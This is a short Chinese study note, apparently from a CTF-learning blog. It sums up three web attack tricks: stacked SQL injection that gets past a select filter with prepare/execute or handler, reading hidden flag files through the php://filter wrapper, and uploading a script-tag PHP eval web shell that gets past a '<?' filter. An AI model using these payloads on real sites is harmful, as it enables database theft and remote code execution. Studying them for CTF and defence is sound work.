学习小结8.25

1.堆叠注入能够到列,再要出详细的数据需要构造select语句,如果select被正则匹配拦下,考虑使用

';set@a=16进制编码的查询语句(例如:select * from 表名);prepare execsql from @a;execute execsql;--+

或者

';handler 表名 open as a;handler a read next;--+

2.文件包含中的文件隐藏的flag,使用伪协议做包含

php://filter/convert.base64-encode/resource=文件名

3.文件上传对于<?的检测

可以使用<script language="php">eval($_POST['a'])</script>绕过

相关推荐
蜡笔新小8 分钟前
Stable diffusion 学习过程
人工智能·学习·stable diffusion
艾伦~耶格尔23 分钟前
Java 正则表达式详解
java·开发语言·学习·正则表达式
栩日月34 分钟前
Linux学习记录十四----------线程的创建和回收
linux·数据结构·学习
滴水成冰-1 小时前
Kotlin-Flow学习笔记
笔记·学习·kotlin
WZF-Sang1 小时前
【MySQL】数据类型【mysql当中各自经典的数据类型的学习和使用】
linux·数据库·sql·学习·mysql·adb
DA树聚9 小时前
大语言模型之ICL(上下文学习) - In-Context Learning Creates Task Vectors
人工智能·学习·程序人生·ai·语言模型·自然语言处理·easyui
神一样的老师11 小时前
使用卷积神经网络进行人类活动识别的特征学习:惯性测量单元和音频数据的案例研究
学习·cnn·音视频
小蒜学长12 小时前
集团门户网站设计与实现
java·开发语言·数据库·学习·tomcat·maven
LeeYLong12 小时前
I2C/IIC学习笔记
笔记·学习·通信协议·i2c